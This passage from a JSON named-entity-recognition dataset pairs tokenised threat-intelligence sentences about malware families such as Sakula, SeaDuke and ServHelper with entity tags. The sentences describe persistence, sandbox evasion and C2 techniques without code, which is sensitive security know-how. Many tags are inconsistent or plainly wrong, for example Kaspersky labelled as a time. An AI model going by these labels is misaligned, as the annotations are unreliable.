"has", "used", "Base64", "to", "encode", "its", "C2", "communications." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Saint", "Bot", "has", "run", "several", "virtual", "machine", "and", "sandbox", "checks,", "including", "checking", "if", "`Sbiedll.dll`", "is", "present", "in", "a", "list", "of", "loaded", "modules,", "comparing", "the", "machine", "name", "to", "`HAL9TH`", "and", "the", "user", "name", "to", "`JohnDoe`,", "and", "checking", "the", "BIOS", "version", "for", "known", "virtual", "machine", "identifiers." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Saint", "Bot", "can", "identify", "the", "OS", "version,", "CPU,", "and", "other", "details", "from", "a", "victim's", "machine." ], "ner_tags": [ "B-SecTeam", "B-Tool", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Saint", "Bot", "has", "conducted", "system", "locale", "checks", "to", "see", "if", "the", "compromised", "host", "is", "in", "Russia,", "Ukraine,", "Belarus,", "Armenia,", "Kazakhstan,", "or", "Moldova." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Area", "B-Area", "B-Area", "B-Area", "B-Area", "O", "B-Area" ] }, { "tokens": [ "Saint", "Bot", "can", "collect", "the", "IP", "address", "of", "a", "victim", "machine." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Saint", "Bot", "can", "collect", "the", "username", "from", "a", "compromised", "host." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Saint", "Bot", "has", "used", "the", "command", "`timeout", "20`", "to", "pause", "the", "execution", "of", "its", "initial", "loader." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Saint", "Bot", "has", "used", "`.vbs`", "scripts", "for", "execution." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Tool", "O", "O" ] }, { "tokens": [ "Saint", "Bot", "has", "used", "HTTP", "for", "C2", "communications." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Saint", "Bot", "has", "used", "`cmd.exe`", "and", "`.bat`", "scripts", "for", "execution." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-SamFile", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Sakula", "contains", "UAC", "bypass", "code", "for", "both", "32-", "and", "64-bit", "systems." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sakula", "uses", "DLL", "side-loading,", "typically", "using", "a", "digitally", "signed", "sample", "of", "Kaspersky", "Anti-Virus", "(AV)", "6.0", "for", "Windows", "Workstations", "or", "McAfee's", "Outlook", "Scan", "About", "Box", "to", "load", "malicious", "DLL", "files." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Time", "O", "O", "O", "O", "O", "O", "O", "B-Time", "O", "B-SecTeam", "O", "B-SecTeam", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sakula", "uses", "single-byte", "XOR", "obfuscation", "to", "obfuscate", "many", "of", "its", "files." ], "ner_tags": [ "B-Idus", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Some", "Sakula", "samples", "use", "cmd.exe", "to", "delete", "temporary", "files." ], "ner_tags": [ "O", "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Sakula", "has", "the", "capability", "to", "download", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ "Most", "Sakula", "samples", "maintain", "persistence", "by", "setting", "the", "Registry", "Run", "key", "<code>SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\</code>", "in", "the", "HKLM", "or", "HKCU", "hive,", "with", "the", "Registry", "value", "and", "file", "name", "varying", "by", "sample." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sakula", "calls", "cmd.exe", "to", "run", "various", "DLL", "files", "via", "rundll32." ], "ner_tags": [ "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Sakula", "encodes", "C2", "traffic", "with", "single-byte", "XOR", "keys." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sakula", "uses", "HTTP", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Sakula", "calls", "cmd.exe", "to", "run", "various", "DLL", "files", "via", "rundll32", "and", "also", "to", "perform", "file", "cleanup.", "Sakula", "also", "has", "the", "capability", "to", "invoke", "a", "reverse", "shell." ], "ner_tags": [ "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "Some", "Sakula", "samples", "install", "themselves", "as", "services", "for", "persistence", "by", "calling", "WinExec", "with", "the", "<code>net", "start</code>", "argument." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SamSam", "has", "used", "garbage", "code", "to", "pad", "some", "of", "its", "malware", "components." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SamSam", "encrypts", "victim", "files", "using", "RSA-2048", "encryption", "and", "demands", "a", "ransom", "be", "paid", "in", "Bitcoin", "to", "decrypt", "those", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SamSam", "has", "been", "seen", "using", "AES", "or", "DES", "to", "encrypt", "payloads", "and", "payload", "components." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "B-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "SamSam", "has", "been", "seen", "deleting", "its", "own", "files", "and", "payloads", "to", "make", "analysis", "of", "the", "attack", "more", "difficult." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-OffAct", "O", "O" ] }, { "tokens": [ "SamSam", "uses", "custom", "batch", "scripts", "to", "execute", "some", "of", "its", "components." ], "ner_tags": [ "B-Idus", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Samurai", "can", "compile", "and", "execute", "downloaded", "modules", "at", "runtime." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Samurai", "can", "leverage", "an", "exfiltration", "module", "to", "download", "arbitrary", "files", "from", "compromised", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "Samurai", "can", "encrypt", "API", "name", "strings", "with", "an", "XOR-based", "algorithm." ], "ner_tags": [ "B-Idus", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Samurai", "can", "use", "a", "specific", "module", "for", "file", "enumeration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Samurai", "has", "been", "used", "to", "deploy", "other", "malware", "including", "Ninja." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool" ] }, { "tokens": [ "Samurai", "has", "created", "the", "directory", "`%COMMONPROGRAMFILES%\\Microsoft", "Shared\\wmi\\`", "to", "contain", "DLLs", "for", "loading", "successive", "stages." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Samurai", "loader", "component", "can", "create", "multiple", "Registry", "keys", "to", "force", "the", "svchost.exe", "process", "to", "load", "the", "final", "backdoor." ], "ner_tags": [ "O", "B-Way", "I-Tool", "I-Tool", "O", "I-Features", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Samurai", "has", "the", "ability", "to", "call", "Windows", "APIs." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Samurai", "can", "use", "a", "proxy", "module", "to", "forward", "TCP", "packets", "to", "external", "hosts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Samurai", "can", "encrypt", "the", "names", "of", "requested", "APIs", "and", "deliver", "its", "final", "payload", "as", "a", "compressed,", "encrypted", "and", "base64", "encoded", "blob." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Samurai", "has", "the", "ability", "to", "proxy", "connections", "to", "specified", "remote", "IPs", "and", "ports", "through", "a", "a", "proxy", "module." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Samurai", "can", "query", "`SOFTWARE\\Microsoft\\.NETFramework\\policy\\v2.0`", "for", "discovery." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Samurai", "can", "check", "for", "the", "presence", "and", "version", "of", "the", ".NET", "framework." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Samurai", "can", "base64", "encode", "data", "sent", "in", "C2", "communications", "prior", "to", "its", "encryption." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Samurai", "can", "encrypt", "C2", "communications", "with", "AES." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Samurai", "can", "use", "a", ".NET", "HTTPListener", "class", "to", "receive", "and", "handle", "HTTP", "POST", "requests." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Samurai", "can", "use", "a", "remote", "command", "module", "for", "execution", "via", "the", "Windows", "command", "line." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Samurai", "can", "create", "a", "service", "at", "`HKLM\\SOFTWARE\\Microsoft\\Windows", "NT\\CurrentVersion\\SvcHost`", "to", "trigger", "execution", "and", "maintain", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sardonic", "has", "the", "ability", "to", "send", "a", "random", "64-byte", "RC4", "key", "to", "communicate", "with", "actor-controlled", "C2", "servers", "by", "using", "an", "RSA", "public", "key." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Sardonic", "can", "use", "the", "`QueueUserAPC`", "API", "to", "execute", "shellcode", "on", "a", "compromised", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sardonic", "PowerShell", "scripts", "can", "be", "encrypted", "with", "RC4", "and", "compressed", "using", "Gzip." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Sardonic", "has", "the", "ability", "to", "collect", "data", "from", "a", "compromised", "machine", "to", "deliver", "to", "the", "attacker." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg" ] }, { "tokens": [ "Sardonic", "can", "first", "decrypt", "with", "the", "RC4", "algorithm", "using", "a", "hardcoded", "decryption", "key", "before", "decompressing." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sardonic", "has", "the", "ability", "to", "delete", "created", "WMI", "objects", "to", "evade", "detections." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Sardonic", "has", "the", "ability", "to", "upload", "additional", "malicious", "files", "to", "a", "compromised", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "B-Way", "B-HackOrg", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Sardonic", "has", "the", "ability", "to", "call", "Win32", "API", "functions", "to", "determine", "if", "`powershell.exe`", "is", "running." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "Sardonic", "has", "the", "ability", "to", "execute", "the", "`net", "view`", "command." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sardonic", "can", "communicate", "with", "actor-controlled", "C2", "servers", "by", "using", "a", "custom", "little-endian", "binary", "protocol." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "B-HackOrg", "B-Tool", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "Sardonic", "has", "the", "ability", "to", "connect", "with", "actor-controlled", "C2", "servers", "using", "a", "custom", "binary", "protocol", "over", "port", "443." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-HackOrg", "B-HackOrg", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "Sardonic", "can", "use", "certain", "ConfuserEx", "features", "for", "obfuscation", "and", "can", "be", "encoded", "in", "a", "base64", "string." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sardonic", "has", "the", "ability", "to", "execute", "PowerShell", "commands", "on", "a", "compromised", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Sardonic", "has", "the", "ability", "to", "execute", "the", "`tasklist`", "command." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sardonic", "has", "a", "plugin", "system", "that", "can", "load", "specially", "made", "DLLs", "into", "memory", "and", "execute", "their", "functions." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sardonic", "can", "encode", "client", "ID", "data", "in", "32", "uppercase", "hex", "characters", "and", "transfer", "to", "the", "actor-controlled", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sardonic", "has", "the", "ability", "to", "use", "an", "RC4", "key", "to", "encrypt", "communications", "to", "and", "from", "actor-controlled", "C2", "servers." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "B-Idus", "B-Way", "B-Tool" ] }, { "tokens": [ "Sardonic", "has", "the", "ability", "to", "collect", "the", "computer", "name,", "CPU", "manufacturer", "name,", "and", "C:\\", "drive", "serial", "number", "from", "a", "compromised", "machine.", "Sardonic", "also", "has", "the", "ability", "to", "execute", "the", "`ver`", "and", "`systeminfo`", "commands." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sardonic", "has", "the", "ability", "to", "execute", "the", "`ipconfig`", "command." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sardonic", "has", "the", "ability", "to", "execute", "the", "`netstat`", "command." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sardonic", "has", "the", "ability", "to", "execute", "the", "`net", "start`", "command." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sardonic", "has", "the", "ability", "to", "run", "`cmd.exe`", "or", "other", "interactive", "processes", "on", "a", "compromised", "computer." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sardonic", "can", "use", "WMI", "to", "execute", "PowerShell", "commands", "on", "a", "compromised", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "B-HackOrg", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Sardonic", "can", "use", "a", "WMI", "event", "filter", "to", "invoke", "a", "command-line", "event", "consumer", "to", "gain", "persistence." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SeaDuke", "compressed", "data", "with", "zlib", "prior", "to", "sending", "it", "over", "C2." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SeaDuke", "can", "securely", "delete", "files,", "including", "deleting", "itself", "from", "the", "victim." ], "ner_tags": [ "B-Way", "O", "O", "B-Features", "O", "O", "B-Features", "B-Way", "O", "O", "O" ] }, { "tokens": [ "SeaDuke", "is", "capable", "of", "uploading", "and", "downloading", "files." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Features", "O", "B-Features", "O" ] }, { "tokens": [ "Some", "SeaDuke", "samples", "have", "a", "module", "to", "use", "pass", "the", "ticket", "with", "Kerberos", "for", "authentication." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SeaDuke", "uses", "a", "module", "to", "execute", "Mimikatz", "with", "PowerShell", "to", "perform", "Pass", "the", "Ticket." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SeaDuke", "is", "capable", "of", "persisting", "via", "the", "Registry", "Run", "key", "or", "a", ".lnk", "file", "stored", "in", "the", "Startup", "directory." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Some", "SeaDuke", "samples", "have", "a", "module", "to", "extract", "email", "from", "Microsoft", "Exchange", "servers", "using", "compromised", "credentials." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "SeaDuke", "is", "capable", "of", "persisting", "via", "a", ".lnk", "file", "stored", "in", "the", "Startup", "directory." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SeaDuke", "has", "been", "packed", "with", "the", "UPX", "packer." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "B-HackOrg" ] }, { "tokens": [ "SeaDuke", "C2", "traffic", "is", "base64-encoded." ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "SeaDuke", "C2", "traffic", "has", "been", "encrypted", "with", "RC4", "and", "AES." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Some", "SeaDuke", "samples", "have", "a", "module", "to", "extract", "email", "from", "Microsoft", "Exchange", "servers", "using", "compromised", "credentials." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "SeaDuke", "uses", "HTTP", "and", "HTTPS", "for", "C2." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "SeaDuke", "is", "capable", "of", "executing", "commands." ], "ner_tags": [ "B-Way", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ "SeaDuke", "uses", "an", "event", "filter", "in", "WMI", "code", "to", "execute", "a", "previously", "dropped", "executable", "shortly", "after", "system", "startup." ], "ner_tags": [ "B-Way", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Seasalt", "obfuscates", "configuration", "data." ], "ner_tags": [ "B-Idus", "O", "O", "O" ] }, { "tokens": [ "Seasalt", "has", "a", "command", "to", "delete", "a", "specified", "file." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "Seasalt", "has", "the", "capability", "to", "identify", "the", "drive", "type", "on", "a", "victim." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Seasalt", "has", "a", "command", "to", "download", "additional", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Seasalt", "has", "masqueraded", "as", "a", "service", "called", "\"SaSaut\"", "with", "a", "display", "name", "of", "\"System", "Authorization", "Service\"", "in", "an", "apparent", "attempt", "to", "masquerade", "as", "a", "legitimate", "service." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Seasalt", "has", "a", "command", "to", "perform", "a", "process", "listing." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Seasalt", "creates", "a", "Registry", "entry", "to", "ensure", "infection", "after", "reboot", "under", "<code>HKLM\\Software\\Microsoft\\Windows\\currentVersion\\Run</code>." ], "ner_tags": [ "B-Idus", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Seasalt", "uses", "HTTP", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Seasalt", "uses", "cmd.exe", "to", "create", "a", "reverse", "shell", "on", "the", "infected", "endpoint." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Seasalt", "is", "capable", "of", "installing", "itself", "as", "a", "service." ], "ner_tags": [ "B-Way", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "ServHelper", "has", "added", "a", "user", "named", "\"supportaccount\"", "to", "the", "Remote", "Desktop", "Users", "and", "Administrators", "groups." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "B-Purp", "B-Org", "O", "B-Org", "O" ] }, { "tokens": [ "ServHelper", "may", "set", "up", "a", "reverse", "SSH", "tunnel", "to", "give", "the", "attacker", "access", "to", "services", "running", "on", "the", "victim,", "such", "as", "RDP." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "ServHelper", "has", "a", "module", "to", "delete", "itself", "from", "the", "infected", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ServHelper", "may", "download", "additional", "files", "to", "execute." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "ServHelper", "has", "created", "a", "new", "user", "named", "\"supportaccount\"." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "ServHelper", "has", "the", "ability", "to", "execute", "a", "PowerShell", "script", "to", "get", "information", "from", "the", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "ServHelper", "may", "attempt", "to", "establish", "persistence", "via", "the", "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\</code>", "run", "key." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "ServHelper", "has", "commands", "for", "adding", "a", "remote", "desktop", "user", "and", "sending", "RDP", "traffic", "to", "the", "attacker", "through", "a", "reverse", "SSH", "tunnel." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ServHelper", "contains", "a", "module", "for", "downloading", "and", "executing", "DLLs", "that", "leverages", "<code>rundll32.exe</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "B-Features", "B-SamFile" ] }, { "tokens": [ "ServHelper", "contains", "modules", "that", "will", "use", "schtasks", "to", "carry", "out", "malicious", "operations." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ServHelper", "will", "attempt", "to", "enumerate", "Windows", "version", "and", "system", "architecture." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ServHelper", "will", "attempt", "to", "enumerate", "the", "username", "of", "the", "victim." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ServHelper", "uses", "HTTP", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O" ] }, { "tokens": [ "ServHelper", "can", "execute", "shell", "commands", "against", "cmd." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Seth-Locker", "can", "encrypt", "files", "on", "a", "targeted", "system,", "appending", "them", "with", "the", "suffix", ".seth." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O", "O", "B-Features", "O", "O", "O", "B-SamFile", "B-SamFile" ] }, { "tokens": [ "Seth-Locker", "has", "the", "ability", "to", "download", "and", "execute", "files", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Seth-Locker", "can", "execute", "commands", "via", "the", "command", "line", "shell." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShadowPad", "has", "used", "DNS", "tunneling", "for", "C2", "communications." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "ShadowPad", "has", "decrypted", "a", "binary", "blob", "to", "start", "execution." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "ShadowPad", "uses", "a", "DGA", "that", "is", "based", "on", "the", "day", "of", "the", "month", "for", "C2", "servers." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShadowPad", "has", "injected", "a", "DLL", "into", "svchost.exe." ], "ner_tags": [ "B-Way", "O", "I-Way", "I-Way", "O", "O", "B-Way" ] }, { "tokens": [ "ShadowPad", "has", "used", "FTP", "for", "C2", "communications." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Idus" ] }, { "tokens": [ "ShadowPad", "maintains", "a", "configuration", "block", "and", "virtual", "file", "system", "in", "the", "Registry." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShadowPad", "has", "deleted", "arbitrary", "Registry", "values." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O" 